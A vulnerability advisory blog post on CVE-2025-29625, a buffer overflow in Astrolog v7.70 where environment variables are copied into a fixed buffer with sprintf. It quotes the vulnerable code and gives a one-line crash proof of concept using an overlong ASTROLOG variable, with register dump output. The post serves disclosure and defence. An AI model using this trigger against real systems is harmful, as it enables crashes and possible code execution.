Buffer Overflow Vulnerability in Astrolog v7.70 (CVE-2025-29625)

Amir M. Jahangirzad - - 3 mins read

Overview

A buffer overflow vulnerability has been discovered in Astrolog v7.70, a popular open-source astrology software. This vulnerability allows an attacker to execute arbitrary code or cause a Denial of Service (DoS) by supplying an overly long environment variable to the FileOpen function.

  • CVE ID: CVE-2025-29625
  • Vulnerability Type: Buffer Overflow
  • Impact: Remote Code Execution (RCE) & Denial of Service (DoS)
  • Attack Vector: Local (via environment variables)

Technical Details

The vulnerability exists in the following section of the FileOpen function, where the program reads environment variables and constructs file paths using sprintf without proper bounds checking:

#ifdef ENVIRON
    // Next look for the file in the directory indicated by the version
    // specific system environment variable.
    sprintf(sz, "%s%s", ENVIRONVER, szVerCore);
    env = getenv(sz);
    if (env && *env) {
      sprintf(sz, "%s%c%s", env, chDirSep, szFileT);
      file = fopen(sz, szMode);
      if (file != NULL)
        goto LDone;
    }

    // Next look in the directory in the general environment variable.
    env = getenv(ENVIRONALL);
    if (env && *env) {
      sprintf(sz, "%s%c%s", env, chDirSep, szFileT);
      file = fopen(sz, szMode);
      if (file != NULL)
        goto LDone;
    }

    // Next look in directory in the version prefix environment variable.
    env = getenv(ENVIRONVER);
    if (env && *env) {
      sprintf(sz, "%s%c%s", env, chDirSep, szFileT);
      file = fopen(sz, szMode);
      if (file != NULL)
        goto LDone;
    }
#endif

Root Cause

  • The function retrieves environment variables using getenv().
  • These values are concatenated into the sz buffer using sprintf(), which does not perform bounds checking.
  • If an attacker sets an excessively large environment variable value, the buffer overflows, leading to potential memory corruption and arbitrary code execution.

Proof of Concept (PoC)

The following PoC demonstrates how setting an overly long environment variable triggers a crash:

The PoC

export ASTROLOG=$(python3 -c 'print("A" * 1024)'); ./astrolog; dmesg | tail -n 10

The Output

[reo@Reodus Astrolog]$ export ASTROLOG=$(python3 -c 'print("A" * 1024)'); ./astrolog; dmesg | tail -n 9
[1]    3510 segmentation fault (core dumped)  ./astrolog
[18678.065821] RIP: 0033:0x64ea8d9d6c33
[18678.065824] Code: 00 00 e8 80 c6 fe ff 48 89 df e8 54 8b 0b 00 c7 05 7e 6b 11 00 01 00 00 00 48 81 c4 08 03 00 00 5b 5d 41 5c 41 5d 41 5e 41 5f <c3> 48 89 e0 e9 35 ff ff ff 48 8d ac 24 00 02 00 00 48 89 ef e8 69
[18678.065825] RSP: 002b:00007fff132395c8 EFLAGS: 00010202
[18678.065827] RAX: 0000000000000000 RBX: 4141414141414141 RCX: 000064ea8da972e7
[18678.065828] RDX: 0000000000000000 RSI: 0000795f29f07518 RDI: 000064ea8dac78b0
[18678.065829] RBP: 4141414141414141 R08: 00007fff13239134 R09: 0000000000000000
[18678.065830] R10: 0000000000000018 R11: 0000000000000006 R12: 4141414141414141
[18678.065831] R13: 4141414141414141 R14: 4141414141414141 R15: 4141414141414141
[18678.065831] FS:  0000795f29f0d0c0 GS:  0000000000000000

Exploitation Impact

  • Denial of Service (DoS): The program crashes due to memory corruption.
  • Arbitrary Code Execution: Under certain conditions, an attacker could overwrite return addresses and execute arbitrary code.

References